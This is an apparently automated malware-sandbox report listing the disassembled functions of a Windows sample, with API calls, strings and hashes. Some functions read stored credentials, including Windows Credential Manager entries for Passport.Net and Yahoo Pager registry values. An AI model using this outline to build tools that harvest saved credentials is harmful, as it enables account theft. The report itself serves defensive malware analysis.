                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                  • String ID:
                  • API String ID: 3673709545-0
                  • Opcode ID: 93f7bf16144be3831d8fe0abe45ae6939580c4d2b0c37b8b20f1dfc57d53bec6
                  • Instruction ID: 4681c035099bb4a28d1464aa710f9ac1d1cdfab18a2ba86be57a79ad66400e71
                  • Opcode Fuzzy Hash: 93f7bf16144be3831d8fe0abe45ae6939580c4d2b0c37b8b20f1dfc57d53bec6
                  • Instruction Fuzzy Hash: 33018C71280304BFFA226B60EE47FD57BA2AB48B01F008465F348AD0F2CBF129509B08
                  Function 00407E74 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00407E9F
                  • sprintf.MSVCRT ref: 00407EB4
                    • Part of subcall function 00407F4F: memset.MSVCRT ref: 00407F73
                    • Part of subcall function 00407F4F: GetPrivateProfileStringA.KERNEL32(004182C0,0000000A,0041344F,?,00001000,004181B8), ref: 00407F95
                    • Part of subcall function 00407F4F: strcpy.MSVCRT(?,?), ref: 00407FAF
                  • SetWindowTextA.USER32(?,?), ref: 00407EDB
                  • EnumChildWindows.USER32(?,Function_00007E17,00000000), ref: 00407EEB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                  • String ID: caption$dialog_%d
                  • API String ID: 246480800-4161923789
                  • Opcode ID: 6e550837f943315e237d33f8ccb0dbabbd4e98402079b2b4a2b47b3f427e8a7f
                  • Instruction ID: c346797357670b32f643cbd36cfbc212eb539bb93902627947de0ac2d0f12ab5
                  • Opcode Fuzzy Hash: 6e550837f943315e237d33f8ccb0dbabbd4e98402079b2b4a2b47b3f427e8a7f
                  • Instruction Fuzzy Hash: DBF0BB3058424D7EDB129750DD06FD97A68AB18746F0400EAFB44E10D1DBF8AAD0875E
                  Function 0040E8C6 Relevance: 9.1, APIs: 6, Instructions: 142stringCOMMON
                  Download Yara Rule
                  APIs
                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040E3BD,00000000,00000000), ref: 0040E8FD
                  • memset.MSVCRT ref: 0040E95A
                  • memset.MSVCRT ref: 0040E96C
                    • Part of subcall function 0040E7E3: strcpy.MSVCRT(?,-00000001), ref: 0040E809
                  • memset.MSVCRT ref: 0040EA53
                  • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040EA78
                  • CloseHandle.KERNEL32(00000000,0040E3BD,?), ref: 0040EAC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$strcpy$CloseHandleOpenProcess
                  • String ID:
                  • API String ID: 3799309942-0
                  • Opcode ID: d6c67b7d57a34b5381901d3c53457be756757403445260d001e2bbe54def35e2
                  • Instruction ID: 2a82ac7989168376751b009825c1859dcdea9a7a89aff0dc4cc4404167d83f81
                  • Opcode Fuzzy Hash: d6c67b7d57a34b5381901d3c53457be756757403445260d001e2bbe54def35e2
                  • Instruction Fuzzy Hash: 79512EB1A00218AFDB10DF95CD85ADEBBB8FB48304F1445AAF505A2281DB749F90CF69
                  Function 004094DC Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 106stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76F90A60,00000000,?,?,00409460,00000001,00413B1C,76F90A60), ref: 00405F21
                  • strcat.MSVCRT(?,&nbsp;), ref: 004095A1
                  • sprintf.MSVCRT ref: 004095C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileWritesprintfstrcatstrlen
                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                  • API String ID: 3813295786-4153097237
                  • Opcode ID: 08929488c0db453afa1456f90ad20cd14aeeb908293d423d0ab32d1dc2333b83
                  • Instruction ID: d2e4fb28aa3b1966a3fc448ecfbbe776d9831430555dea6067297da34f065eca
                  • Opcode Fuzzy Hash: 08929488c0db453afa1456f90ad20cd14aeeb908293d423d0ab32d1dc2333b83
                  • Instruction Fuzzy Hash: 4F318F32900209AFDF15DF95C8869DE7BB5FF44314F1041AAFD10AB1E2D776A951CB84
                  Function 0040AC6E Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040AC8E
                    • Part of subcall function 00407A69: LoadStringA.USER32(00000000,0000000D,00000FFF,?), ref: 00407B32
                    • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                    • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76F90A60), ref: 00407AE4
                    • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                    • Part of subcall function 0040687C: memset.MSVCRT ref: 0040689C
                    • Part of subcall function 0040687C: sprintf.MSVCRT ref: 004068C9
                    • Part of subcall function 0040687C: strlen.MSVCRT ref: 004068D5
                    • Part of subcall function 0040687C: memcpy.MSVCRT ref: 004068EA
                    • Part of subcall function 0040687C: strlen.MSVCRT ref: 004068F8
                    • Part of subcall function 0040687C: memcpy.MSVCRT ref: 00406908
                    • Part of subcall function 004066AF: GetSaveFileNameA.COMDLG32(?), ref: 004066FE
                    • Part of subcall function 004066AF: strcpy.MSVCRT(?,?), ref: 00406715
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                  • String ID: *.csv$*.htm;*.html$*.txt$<DA$txt
                  • API String ID: 4021364944-2752249159
                  • Opcode ID: 1ceb36e2604b9e9553284c6e0b24bc998c578e1058e1945574a68be56ec71ef9
                  • Instruction ID: b1b2e5a0efe066de17158a8bc8fa7ff9efe1d0f31d50f94681ee96e1b845f603
                  • Opcode Fuzzy Hash: 1ceb36e2604b9e9553284c6e0b24bc998c578e1058e1945574a68be56ec71ef9
                  • Instruction Fuzzy Hash: B82101B1E042199ED700EFE6D8817DEBBB4AB08704F10417FE509B7282D7382B458F5A
                  Function 00403A67 Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00403A8C
                  • memset.MSVCRT ref: 00403AA5
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403ABC
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403ADB
                  • strlen.MSVCRT ref: 00403AED
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWidememset$FileWritestrlen
                  • String ID:
                  • API String ID: 1786725549-0
                  • Opcode ID: 3f400ef8c2c76e934e80ec81a0c92b5e5fe334d0f7b850a86132a32295095dc5
                  • Instruction ID: 60d5cd2968a458345304ed859c80f0f17d47a7f7ae6e16c58bf0b652b2e175c6
                  • Opcode Fuzzy Hash: 3f400ef8c2c76e934e80ec81a0c92b5e5fe334d0f7b850a86132a32295095dc5
                  • Instruction Fuzzy Hash: B8116DB650012CBEFB009B94DD85DEBB7ADEF08354F0041A2B719E2091D6759F54CB78
                  Function 004065B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 53stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcat$memsetsprintf
                  • String ID: %2.2X
                  • API String ID: 582077193-791839006
                  • Opcode ID: f97dc6c3a2e75b9a245aecc583dcd71bc50743b83a8a0946cd7d9d5c2e4ca989
                  • Instruction ID: 9a6b28ef774d6e53ee32a9c0eecf57d77903bda120735f9d6ade06843e2f5b66
                  • Opcode Fuzzy Hash: f97dc6c3a2e75b9a245aecc583dcd71bc50743b83a8a0946cd7d9d5c2e4ca989
                  • Instruction Fuzzy Hash: 03014C32A042152AD73266569C02BEB3B9C9B58708F10817FF944E51C2EAFCD6D4879D
                  Function 00410596 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 607c23ff0e486e070c5426f82ff3d7a24f97f784535b6e080ccd99acf642cc13
                  • Instruction ID: 21774ca54697e01c1adc3851c2de10052fd52e5bfec277bf8b6dbebc5e22beff
                  • Opcode Fuzzy Hash: 607c23ff0e486e070c5426f82ff3d7a24f97f784535b6e080ccd99acf642cc13
                  • Instruction Fuzzy Hash: 55014872906D316BC5357A3559017DBA3947F05B19B06020FFA09B73424BAC7CE0C9DD
                  Function 004016E5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                  Download Yara Rule
                  APIs
                  • GetClientRect.USER32(?,?), ref: 004016F4
                  • GetSystemMetrics.USER32(00000015), ref: 00401702
                  • GetSystemMetrics.USER32(00000014), ref: 0040170E
                  • BeginPaint.USER32(?,?), ref: 00401728
                  • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 00401737
                  • EndPaint.USER32(?,?), ref: 00401744
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                  • String ID:
                  • API String ID: 19018683-0
                  • Opcode ID: 2260b63d1688647689794fdb84e8332651a2a8fc8b06cd3bb88943ade092d718
                  • Instruction ID: 87b9e555b8a68b0804226e1a7d1b9f87043edf3c617a3ea881a1d9d020f86292
                  • Opcode Fuzzy Hash: 2260b63d1688647689794fdb84e8332651a2a8fc8b06cd3bb88943ade092d718
                  • Instruction Fuzzy Hash: 0D01FB72900218BFDF04DFA8DC499FE7BBDFB45702F004469EE11AA194DAB1AA08CB54
                  Function 00411A0F Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00411A30
                  • memset.MSVCRT ref: 00411A49
                  • memset.MSVCRT ref: 00411A5D
                    • Part of subcall function 00411533: strlen.MSVCRT ref: 00411540
                  • strlen.MSVCRT ref: 00411A79
                  • memcpy.MSVCRT ref: 00411A9E
                  • memcpy.MSVCRT ref: 00411AB4
                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEDF
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF0B
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF21
                    • Part of subcall function 0040BEEC: memcpy.MSVCRT ref: 0040BF58
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF62
                  • memcpy.MSVCRT ref: 00411AF4
                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BE91
                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEBB
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF33
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memcpymemset$strlen
                  • String ID:
                  • API String ID: 2142929671-0
                  • Opcode ID: 89ceb3d21e91c6af02e864f567a05f0a8fa48fa73525340af3882809b2e08623
                  • Instruction ID: 6f2ed515a41b06c6c22f205846f23ff7f18478afa58802cd03ca93c0f6d1378b
                  • Opcode Fuzzy Hash: 89ceb3d21e91c6af02e864f567a05f0a8fa48fa73525340af3882809b2e08623
                  • Instruction Fuzzy Hash: 29512B7290015DAACB14DF55CC81AEEB7A9FF04308F5441BAE609E7151EB34AA89CF98
                  Function 0040B4DE Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115windowCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040B548
                  • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040B58C
                  • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B5A6
                  • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040B649
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Message$MenuPostSendStringmemset
                  • String ID: 84A
                  • API String ID: 3798638045-1875439563
                  • Opcode ID: d3a55612aad303442b70cf6981c395df1170026015e9bbabf54ddfea19c8819b
                  • Instruction ID: f81f675eeec9d049c2f837a36ed854dba7505ce636643832e7163bdc5c509590
                  • Opcode Fuzzy Hash: d3a55612aad303442b70cf6981c395df1170026015e9bbabf54ddfea19c8819b
                  • Instruction Fuzzy Hash: F141E130600611EFCB259F24CC85AA6BBA4FF04325F1486B6E958AB2C5C378DD91CBDD
                  Function 0040DC39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                    • Part of subcall function 00404651: LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,76DBEC10), ref: 0040465E
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,76DBEC10), ref: 004047B2
                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040DD05
                  • strlen.MSVCRT ref: 0040DD15
                  • strcpy.MSVCRT(?,?), ref: 0040DD26
                  • LocalFree.KERNEL32(?), ref: 0040DD33
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                  • String ID: Passport.Net\*
                  • API String ID: 3335197805-3671122194
                  • Opcode ID: d42203313a812c175362967ded223f6fc05771b77deb048e9d9358547b9af39c
                  • Instruction ID: efac9c12738a0d8289842d1efaad299d98c72222a78c1cf1bd4cf7de0e5ce36b
                  • Opcode Fuzzy Hash: d42203313a812c175362967ded223f6fc05771b77deb048e9d9358547b9af39c
                  • Instruction Fuzzy Hash: 47313AB6E00109ABDB10EF96DD45DEE7BB8EF85304F10007AE605F7291D7389A45CB68
                  Function 00403278 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00403127: strchr.MSVCRT ref: 0040323C
                  • memset.MSVCRT ref: 004032CC
                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 004032E6
                  • strchr.MSVCRT ref: 0040331B
                    • Part of subcall function 004023C6: _mbsicmp.MSVCRT ref: 004023FE
                  • strlen.MSVCRT ref: 0040335D
                    • Part of subcall function 004023C6: _mbscmp.MSVCRT ref: 004023DA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                  • String ID: Personalities
                  • API String ID: 2103853322-4287407858
                  • Opcode ID: fec04840c498abd3992574a7e604aaddea038dd89c6a73b46c7ff5499d0b65e7
                  • Instruction ID: a1e53a31d12307489e3dcdfde72dead8da93f466afb76ebe56892d48a8bd1a3f
                  • Opcode Fuzzy Hash: fec04840c498abd3992574a7e604aaddea038dd89c6a73b46c7ff5499d0b65e7
                  • Instruction Fuzzy Hash: 2A21D676A041096EDB10AF699D81ADE7F6C9F00309F1440BBEA04F3181DB789B86866D
                  Function 0040A6C6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Cursor_mbsicmpqsort
                  • String ID: /nosort$/sort
                  • API String ID: 882979914-1578091866
                  • Opcode ID: b62834dc514b00cfd30f714a9fad692c6252d4fd7e33ed5c13f61842356538e2
                  • Instruction ID: d235f9a75b77abe912022d820ae93ced97f95949ab3107a8ace45c524b087071
                  • Opcode Fuzzy Hash: b62834dc514b00cfd30f714a9fad692c6252d4fd7e33ed5c13f61842356538e2
                  • Instruction Fuzzy Hash: 5421C170704602EFC719EF75C884A95B7A9FF48314B10413EF529A7291DB39AC218B8A
                  Function 00411622 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00411644
                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                    • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004116B0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenQueryValuememset
                  • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                  • API String ID: 1830152886-1703613266
                  • Opcode ID: 3ec72928c88313449a069dffbaf2e341cc248c5522c4285b6e7c3985674fc6c1
                  • Instruction ID: 516cda371f3396bdfc4173c93ac40c9cbeab8f1746814b3412c432ea0c8be721
                  • Opcode Fuzzy Hash: 3ec72928c88313449a069dffbaf2e341cc248c5522c4285b6e7c3985674fc6c1
                  • Instruction Fuzzy Hash: 8401C4B5A00018FBDB109A15CD01FDE7A6D9B90354F040072FF08F2221F2358F599A98
                  Function 00405F4B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?), ref: 00405F5B
                  • sprintf.MSVCRT ref: 00405F83
                  • MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00405F9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLastMessagesprintf
                  • String ID: Error$Error %d: %s
                  • API String ID: 1670431679-1552265934
                  • Opcode ID: 4911e26903d4482cbd9d642036671f993fd1af17c5afcfd040224a18a71cc317
                  • Instruction ID: f1cbc3d381c34e383a1f44b31e9a73e3da945176662b790f0432ac9700464d50
                  • Opcode Fuzzy Hash: 4911e26903d4482cbd9d642036671f993fd1af17c5afcfd040224a18a71cc317
                  • Instruction Fuzzy Hash: 90F0A77680010977CB10AB64CC06FDB77BCAB44704F140076BB45E2140EA74DB458EA8
                  Function 0040F6A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,753D8FB0,00405C4B,00000000), ref: 0040F6B1
                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F6BF
                  • FreeLibrary.KERNEL32(00000000), ref: 0040F6D7
                  Strings
                  Memory Dump Source
